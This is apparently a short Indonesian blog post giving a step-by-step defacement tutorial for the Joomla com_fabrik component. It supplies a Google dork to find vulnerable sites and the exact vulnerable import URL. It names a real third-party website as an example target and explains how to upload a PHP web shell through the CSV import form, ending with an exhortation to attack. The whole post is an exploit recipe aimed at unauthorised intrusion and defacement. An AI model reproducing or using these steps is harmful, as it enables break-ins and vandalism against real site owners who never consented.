inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik
Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV
Dan shell kita akan terletak di [site]/media/[shell.php]
Terus, hajar !!!!
Sumber : http://www.madura-cyber.org/2013/04/deface-dengan-joomla-component.html
0 komentar